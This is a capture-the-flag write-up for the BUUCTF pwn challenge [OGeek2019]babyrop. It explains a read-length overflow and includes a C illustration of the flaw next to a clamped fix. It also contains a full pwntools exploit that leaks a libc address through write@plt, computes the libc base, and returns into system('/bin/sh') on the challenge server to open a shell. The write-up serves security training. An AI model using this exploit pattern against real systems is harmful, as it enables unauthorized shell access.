Note: this post was last updated on 2024-08-28 15:14; the information it references may have changed since then.
This challenge needs some background on the PLT and GOT; see: https://bbs.pediy.com/thread-262357.htm
checksec
![BUUCTF-PWN-[OGeek2019]babyrop BUUCTF-PWN-[OGeek2019]babyrop](https://cdn.jsdelivr.net/gh/Chaos-xBug/img/blog/202111131312623.png)
IDA
![BUUCTF-PWN-[OGeek2019]babyrop BUUCTF-PWN-[OGeek2019]babyrop](https://cdn.jsdelivr.net/gh/Chaos-xBug/img/blog/202111131318821.png)
![BUUCTF-PWN-[OGeek2019]babyrop BUUCTF-PWN-[OGeek2019]babyrop](https://cdn.jsdelivr.net/gh/Chaos-xBug/img/blog/202111131319356.png)
The return value of sub_804871F is passed as the argument of the following sub_80487D0 (v5 --> a1).
![BUUCTF-PWN-[OGeek2019]babyrop BUUCTF-PWN-[OGeek2019]babyrop](https://cdn.jsdelivr.net/gh/Chaos-xBug/img/blog/202111131319804.png)
In sub_80487D0 the second read call is the potential overflow point: it overflows when a1 != 127 and a1 is larger than the length of buf.
After that, the libc supplied with the challenge is used for a ret2libc attack to get a shell.
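The length-check flaw described above, as a constructed C illustration added here (it is not the challenge binary's own code): the vulnerable length selection next to a clamped version, plus a check for the overflow condition. BUF_SIZE (0xe7) and the 0xff length byte are taken from the writeup; the separate a1 == 127 branch is omitted.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed illustration of the flaw described above, not the challenge
 * binary's own code. BUF_SIZE matches the 0xe7-byte stack buffer the exploit
 * pads; the separate a1 == 127 branch is left out for brevity. */
#define BUF_SIZE 0xe7
/* Vulnerable pattern: the byte returned by the first stage (a1) is used
 * directly as the read length, so any a1 > BUF_SIZE overruns buf. */
size_t vulnerable_read_len(unsigned char a1) {
    return a1;
}

/* Hardened pattern: clamp the requested length to the buffer size, so the
 * caller-controlled byte can never select more bytes than buf holds. */
size_t safe_read_len(unsigned char a1) {
    return a1 > BUF_SIZE ? BUF_SIZE : a1;
}

/* Returns 1 if the vulnerable length selection would write past buf. */
int would_overflow(unsigned char a1) {
    return vulnerable_read_len(a1) > BUF_SIZE;
}

/* Stand-in for read(0, buf, n) that copies from an in-memory source into a
 * BUF_SIZE-byte buffer using the hardened length; returns bytes copied. */
size_t read_message(char buf[BUF_SIZE], const unsigned char *src,
                    size_t srclen, unsigned char a1) {
    size_t n = safe_read_len(a1);
    if (n > srclen) n = srclen;
    memcpy(buf, src, n);
    return n;
}

/* Feeds a constructed 300-byte message with a1 = 0xff (the length byte the
 * writeup's first payload ends with) and returns how much landed in buf. */
size_t demo_clamped_copy(void) {
    unsigned char src[300];
    char buf[BUF_SIZE];
    memset(src, 'a', sizeof src);
    return read_message(buf, src, sizeof src, 0xff);
}

int main(void) {
    printf("a1=0xff overflows the unpatched read: %d\n", would_overflow(0xff));
    printf("hardened read copies %zu of 300 bytes\n", demo_clamped_copy());
    return 0;
}
```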
EXP
```python
from pwn import *

p = remote('node4.buuoj.cn', 25034)
elf = ELF('./pwn')
libc = ELF('libc-2.23.so')

write_plt = elf.plt['write']
main_addr = 0x08048825
write_got = elf.got['write']

# Stage 1: the 8th byte (0xff) is returned by sub_804871F and becomes a1,
# the length used by the second read in sub_80487D0
payload1 = b'\0' + b'a' * 6 + b'\xff'
p.sendline(payload1)

# Stage 2 layout:
#   'a' * (0xe7 + 4)     fill buf and the saved ebp
#   write_plt            overwrite the return address with write@plt
#   main_addr            write returns to main so we get a second round
#   1, write_got, 4      write(1, write_got, 4): leak write's libc address
payload2 = b'a' * (0xe7 + 4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.recvuntil(b'Correct\n')
p.sendline(payload2)
write_addr = u32(p.recv(4))
print(hex(write_addr))

libc_base = write_addr - libc.symbols['write']
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))

# Stage 3: same overflow again, this time returning into system("/bin/sh")
p.sendline(payload1)
p.recvuntil(b'Correct\n')
payload3 = b'a' * (0xe7 + 4) + p32(system_addr) + p32(0) + p32(binsh_addr)
p.sendline(payload3)
p.interactive()
```
Result
![BUUCTF-PWN-[OGeek2019]babyrop BUUCTF-PWN-[OGeek2019]babyrop](https://cdn.jsdelivr.net/gh/Chaos-xBug/img/blog/202111131326028.png)